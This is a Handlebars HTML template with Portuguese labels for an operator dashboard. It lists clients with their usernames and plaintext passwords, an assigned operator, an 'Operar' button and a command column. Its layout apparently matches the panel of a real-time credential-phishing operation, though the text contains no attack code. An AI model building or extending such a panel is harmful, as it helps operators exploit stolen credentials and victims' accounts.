<div class="card">
    <div class="card-header border-0">
        <div class="row align-items-center">
            <div class="col">
                <h3 class="mb-0">Lista de Produtos</h3>
            </div>
        </div>
    </div>
    <div class="table-responsive">
        <!-- Projects table -->
        <table class="table align-items-center table-flush">
            <thead class="thead-light">
                <tr>
                    <th scope="col">#ID</th>
                    <th scope="col">#Operador</th>
                    <th scope="col">#Ação</th>
                    <th scope="col">USUÁRIO</th>
                    <th scope="col">SENHA</th>
                    <th scope="col">#TIPO/LAN</th>
                    <th scope="col">TEMPO</th>
                    <th scope="col">COMANDO</th>
                    <th scope="col"></th>
                </tr>
            </thead>
            <tbody class="productList">
                {{#each clients}}
                <tr data-id="{{id}}">
                    <th scope="row" role="id">
                        <strong># {{id}}</strong>
                    </th>
                    <td>
                        <strong role="operator">
                            {{#if operator.name}}
                            {{operator.name}}
                            {{else}}
                            Aguardando OP
                            {{/if}}
                        </strong>
                    </td>
                    <td>
                        <a class="btn btn-success btn-sm" target="blank" href="/operator?client={{id}}"
                            role="button">Operar</a>
                    </td>
                    <td role="user">
                        {{user}}
                    </td>
                    <td role="password">
                        {{password}}
                    </td>
                    <td role="type">
                        {{type}}
                    </td>
                    <td role="time">
                        00:00
                    </td>
                    <td role="command">
                        command
                    </td>
                </tr>
                {{/each}}
            </tbody>
        </table>
    </div>
</div>